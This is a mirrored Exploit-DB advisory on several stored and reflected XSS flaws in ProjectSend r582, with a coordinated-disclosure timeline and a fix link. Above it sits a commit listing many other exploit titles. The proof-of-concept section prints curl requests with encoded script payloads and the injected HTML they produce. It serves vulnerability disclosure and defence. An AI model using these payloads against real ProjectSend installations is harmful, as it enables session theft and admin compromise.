bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39588.txt
Offensive Security 2c01698aec DB: 2016-03-22 
14 new exploits

Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit
Drupal <= 4.5.3 & <= 4.6.1 - Comments PHP Injection Exploit

phpBB 2.0.15 - Remote PHP Code Execution Exploit (metasploit)
phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit

vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit)
vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit

WordPress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)
WordPress <= 1.5.1.3 - Remote Code Execution eXploit (Metasploit

Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit)
Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit

Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (metasploit)
Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit

Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities
Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities

IDEAL Administration 2009 9.7 - Buffer Overflow - Metasploit Universal
IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)

PHP RapidKill Pro 5.x Shell Upload Vulnerability
PHP RapidKill Pro 5.x - Shell Upload Vulnerability

Shellcode - Win32 MessageBox (Metasploit module)
Shellcode - Win32 MessageBox (Metasploit)

Php Nuke 8.x.x - BlindSQL Injection Vulnerability
PHP-Nuke 8.x.x - BlindSQL Injection Vulnerability

Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)
Integard Pro 2.2.0.9026 - Windows 7 ROP-Code  (Metasploit)

Digital Music Pad 8.2.3.3.4 - SEH Overflow Metasploit Module
Digital Music Pad 8.2.3.3.4 - SEH Overflow (Metasploit)

MaticMarket 2.02 for PHP Nuke LFI Vulnerability
MaticMarket 2.02 for PHP-Nuke - LFI Vulnerability

Microsoft Word 2003 - Record Parsing Buffer Overflow (Metasploit) (MS09-027)
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)

Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (Metasploit) (0day)
Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (0day) (Metasploit)

Metasploit 4.1.0 Web UI stored XSS Vulnerability
Metasploit 4.1.0 Web UI - Stored XSS Vulnerability

PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability
PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability

Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (metasploit)
Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit

PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty
PHP-Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty

PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability
PHP-Nuke 5.x - Error Message Web Root Disclosure Vulnerability

PHP Nuke 8.2.4 - CSRF Vulnerability
PHP-Nuke 8.2.4 - CSRF Vulnerability

DCP-Portal 3.7/4.x/5.x Calendar.PHP HTTP Response Splitting Vulnerability
DCP-Portal 3.7/4.x/5.x - Calendar.PHP HTTP Response Splitting Vulnerability

PHP Nuke 0-7 Double Hex Encoded Input Validation Vulnerability
PHP-Nuke 0-7 - Double Hex Encoded Input Validation Vulnerability

PHP 4.x/5.x Html_Entity_Decode() Information Disclosure Vulnerability
PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure Vulnerability

Western Digital Arkeia Remote Code Execution (Metasploit)
Western Digital Arkeia - Remote Code Execution (Metasploit)

Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit

Apache + PHP 5.x (< 5.3.12 / < 5.4.2) - Remote Code Execution (Multithreaded Scanner)
Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)

PHP PEAR <= 1.5.3 INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability
PHP PEAR <= 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability

GNU bash Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection (Metasploit)

Bash - CGI RCE (Metasploit) Shellshock Exploit
Bash - CGI RCE Shellshock Exploit (Metasploit)

Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module)
Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)
Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)
WordPress eBook Download Plugin 1.1 - Directory Traversal
WordPress Import CSV Plugin 1.0 - Directory Traversal
WordPress Abtest Plugin - Local File Inclusion
Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit
Disc ORGanizer - DORG - Multiple Vulnerabilities
D-Link DWR-932 Firmware 4.00 - Authentication Bypass
Xoops 2.5.7.2 - Arbitrary User Deletions CSRF
Xoops 2.5.7.2 - Directory Traversal Bypass
WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure
Sysax Multi Server 6.50 - HTTP File Share SEH Overflow RCE Exploit
Dating Pro Genie 2015.7 - CSRF Vulnerabilities
iTop 2.2.1 - CSRF Vulnerability
ProjectSend r582 - Multiple XSS Vulnerabilities
2016-03-22 05:02:50 +00:00

86 lines
No EOL
4.1 KiB
Text
Executable file
Raw Blame History

* Exploit Title: Multiple (persistent) XSS in ProjectSend
* Discovery Date: 2016/02/19
* Public Disclosure Date: 2016/03/17
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Project Homepage: http://www.projectsend.org/
* Software Link: http://www.projectsend.org/download/108/
* Version: r582
* Tested on: Ubuntu 14.04 with Firefox 45.0
* Category: webapps
Description
========================================================================
ProjectSend is a self-hosted PHP based file-transfer platform. Several serious vulnerabilities have been discovered so far (e.g. https://www.exploit-db.com/exploits/39385/). Here are some further persistent and non-persistent XSS vulnerabilities which affect ProjectSend.
PoC
========================================================================
1. Non-Persistent XSS
~~~~~~~~~~~~~~~~~~~~~~
1.1 - As client in searchbox on my_files/index.php:
curl 'http://projectsend.local.de/my_files/' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/my_files/' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E'
1.2 - As admin in searchboxes on "Manage Clients", "Clients groups" and "System Users":
curl 'http://projectsend.local.de/clients.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/clients.php' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'
Output:
<input type="text" name="search" id="search" value=""><script>alert('XSS')</script>" class="txtfield form_actions_search_box" />
The searchboxes on "Clients groups", "System Users" and the "Recent activities log" are injectible in the same way.
2. Persistent XSS
~~~~~~~~~~~~~~~~~~
1.1 - As client in "MyAccount" field "Name":
No special vector required.
HTML output for input "><script>alert(1);</script>:
<input type="text" name="add_client_form_name" id="add_client_form_name" class="required" value=""><script>alert(1);</script>" placeholder="Will be visible on the client's file list" />
This XSS also affects admins when they open the "Clients" -> "Manage clients" page:
clients.php html output:
<td><input type="checkbox" name="selected_clients[]" value="2" /></td>
<td>"><script>alert(1);</script></td>
<td>Client1</td>
The fields "Adress" and "Telephone" are injectible in the same way.
1.2 As client in "File upload" field "Name":
A simple vector suffices: "<script>alert('XSS')</script>
The XSS is activated when admins open the dashboard (the code gets loaded from /actions-log.php via ajax) or when he accesses the "Recent activities log"
actions-log.php html output:
<td class="footable-visible">"<script>alert('XSS')</script></td>
1.3 As admin in "Groups" -> "Add new"
The fields "Name" and "Description" are injectible. The XSS is activated on the "Manage groups" page.
Simple vector: "><script>alert('XSS')</script>
Timeline
========================================================================
2016/02/19 - Issues discovered
2016/02/22 - Developed fixes for these and multiple other vulnerabilities.
Informed project maintainers
2016/03/04 - Fixes merged into master branch by project maintainers
Solution
========================================================================
Update to current version from GitHub. See https://github.com/ignacionelson/ProjectSend/issues/80 for discussion.
Reference in a new issue View git blame Copy permalink